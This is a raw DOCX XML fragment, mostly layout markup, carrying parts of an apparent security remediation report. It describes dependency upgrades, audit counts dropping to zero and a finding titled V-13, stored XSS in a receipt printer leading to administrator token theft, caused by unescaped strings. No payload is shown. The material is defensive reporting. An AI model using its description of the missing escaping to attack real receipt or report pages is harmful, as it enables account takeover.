ZHJzL2Uy&#10;b0RvYy54bWxQSwECLQAUAAYACAAAACEA17fnF+AAAAAJAQAADwAAAAAAAAAAAAAAAAAsBQAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAADkGAAAAAA==&#10;">
                <v:shape id="Shape 1689" o:spid="_x0000_s1027" style="position:absolute;width:381000;height:133350;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3810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plxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvBb9DGMFbzSoo7tYo/qEiFAStB70Nm3GzdDNZklTXb98UCr3N8N7vzZv5srONuJMPtWMFo2EG&#10;grh0uuZKwfnz/XUGIkRkjY1jUvCkAMtF72WOhXYPPtL9FCuRQjgUqMDE2BZShtKQxTB0LXHSbs5b&#10;jGn1ldQeHyncNnKcZVNpseZ0wWBLG0Pl1+nbphqTS77Dw+S53eXXw/X4YfzNrpUa9LvVG4hIXfw3&#10;/9F7nbjpLIffb9IIcvEDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAKLyKZcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l381000,r,133350l9525,133350v-2631,-12,-4876,-943,-6736,-2803l,123826,,9524,2789,2778c4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,381000,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">every exported PDF is built from unescaped server strings (V-13). Upgraded to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^4.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> after confirming </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jspdfautotable@5</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> already declares </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>peerDependencies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas"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jspdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>":"^2 || ^3 || ^4"}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that only APIs stable across the major are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00774481" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="143" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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composer audit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No security vulnerability advisories found</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (41 → 0). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>found 0 vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (23 → 0). Both suites and both builds pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7CAD8" w14:textId="6D09FEA4" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A5C252" w14:textId="1C4F568B"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V-13 · Stored XSS in the receipt printer → administrator token theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CAB1D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="173"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A03:2021 Injection · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-79</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CVSS 8.8</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Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD63E1"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89984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E0CEC4E" wp14:editId="50D26139">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162607</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2266950" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26918" name="Group 26918"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2266950" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2266950" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="667" name="Shape 667"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1685925" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1685925" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1676400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1679030" y="0"/>
                                  <a:pt x="1681275" y="930"/>
                                  <a:pt x="1683135" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1684995" y="4648"/>
                                  <a:pt x="1685925" y="6893"/>
                                  <a:pt x="1685925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1685925" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1685925" y="126454"/>
                                  <a:pt x="1684995" y="128696"/>
                                  <a:pt x="1683135" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1681275" y="132417"/>
                                  <a:pt x="1679030" y="133347"/>
                                  <a:pt x="1676400" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2787"/>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70" name="Shape 670"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1981200" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4648"/>
                                  <a:pt x="285750" y="6893"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128696"/>
                                  <a:pt x="282960" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132417"/>
                                  <a:pt x="278855" y="133347"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128696"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>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18" style="width:178.5pt;height:10.5pt;position:absolute;z-index:-2147483632;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.8037pt;" coordsize="22669,1333">
                <v:shape id="Shape 667" style="position:absolute;width:16859;height:1333;left:0;top:0;" coordsize="1685925,133350" path="m9525,0l1676400,0c1679030,0,1681275,930,1683135,2787c1684995,4648,1685925,6893,1685925,9525l1685925,123825c1685925,126454,1684995,128696,1683135,130556c1681275,132417,1679030,133347,1676400,133350l9525,133350c6895,133347,4650,132417,2790,130556l0,123825l0,9525l2790,2787c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 670" style="position:absolute;width:2857;height:1333;left:19812;top:0;" coordsize="285750,133350" path="m9525,0l276225,0c278855,0,281100,930,282960,2787c284820,4648,285750,6893,285750,9525l285750,123825c285750,126454,284820,128696,282960,130556c281100,132417,278855,133347,276225,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128696,0,126454,0,123825l0,9525c0,6893,930,4648,2790,2787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1008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31E8AF56" wp14:editId="469B31BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4475857</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162607</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1104900" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26919" name="Group 26919"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1104900" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1104900" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="673" name="Shape 673"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1104900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2787"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103969" y="4648"/>
                                  <a:pt x="1104900" y="6893"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="126454"/>
                                  <a:pt x="1103969" y="128696"/>
                                  <a:pt x="1102110" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="132417"/>
                                  <a:pt x="1098005" y="133347"/>
                                  <a:pt x="1095375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133347"/>
                                  <a:pt x="4650" y="132417"/>
                                  <a:pt x="2790" y="130556"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128696"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790" y="2787"/>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19" style="width:87pt;height:10.5pt;position:absolute;z-index:-2147483627;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:352.43pt;mso-position-vertical-relative:text;margin-top:12.8037pt;" coordsize="11049,1333">
                <v:shape id="Shape 673" style="position:absolute;width:11049;height:1333;left:0;top:0;" coordsize="1104900,133350" path="m9525,0l1095375,0c1098005,0,1100250,930,1102110,2787c1103969,4648,1104900,6893,1104900,9525l1104900,123825c1104900,126454,1103969,128696,1102110,130556c1100250,132417,1098005,133347,1095375,133350l9525,133350c6895,133347,4650,132417,2790,130556c930,128696,0,126454,0,123825l0,9525c0,6893,930,4648,2790,2787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Evidence.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> There was no HTML escaping anywhere in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. A repository-wide search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escapeHtml|sanitiz|DOMPurify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spell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returned one hit, and it was an unrelated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encodeURIComponent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p>
    <w:p w14:paraId="4C4DA19A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="3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React escapes everything it renders, so the JSX was never the problem. Receipts and reports are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendered by React</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D7C3E" w14:textId="646ACC3D"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2032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ACFDBAD" wp14:editId="232B68A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19143</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4029075" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26920" name="Group 26920"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4029075" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4029075" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="680" name="Shape 680"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3038475" y="0"/>
                            <a:ext cx="990600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="990600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="983705" y="0"/>
                                  <a:pt x="985950" y="930"/>
                                  <a:pt x="987810" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="989670" y="4645"/>
                                  <a:pt x="990600" y="6893"/>
                                  <a:pt x="990600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="990600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="990600" y="135976"/>
                                  <a:pt x="989670" y="138224"/>
                                  <a:pt x="987810" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="985950" y="141939"/>
                                  <a:pt x="983705" y="142869"/>
                                  <a:pt x="981075"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83" name="Shape 683"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1333500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4645"/>
                                  <a:pt x="1333500" y="6893"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="135976"/>
                                  <a:pt x="1332570" y="138224"/>
                                  <a:pt x="1330710" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="141939"/>
                                  <a:pt x="1326605" y="142869"/>
                                  <a:pt x="1323975" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2784"/>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686" name="Shape 686"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1600200" y="171450"/>
                            <a:ext cx="1276350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4645"/>
                                  <a:pt x="1276350" y="6893"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="135976"/>
                                  <a:pt x="1275420" y="138224"/>
                                  <a:pt x="1273560" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="141939"/>
                                  <a:pt x="1269455" y="142869"/>
                                  <a:pt x="1266825"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20" style="width:317.25pt;height:24.75pt;position:absolute;z-index:-2147483617;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-1.50742pt;" coordsize="40290,3143">
